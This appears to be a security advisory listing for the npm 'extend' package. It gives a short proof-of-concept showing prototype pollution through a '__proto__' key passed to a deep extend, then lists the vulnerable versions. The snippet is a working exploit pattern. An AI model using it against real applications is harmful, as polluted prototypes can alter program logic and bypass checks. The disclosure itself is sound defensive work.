Port of jQuery.extend for node.js and the browser
Latest version: 3.0.2
const extend = require('extend');
extend(true, {}, JSON.parse('{"__proto__": {"a": "b"}}'));
if (({}).a === 'b') console.log('exploitable');
Vulnerable versions: 1.1.3
1.2.0
1.2.1
1.3.0
2.0.0
2.0.1
3.0.0
3.0.1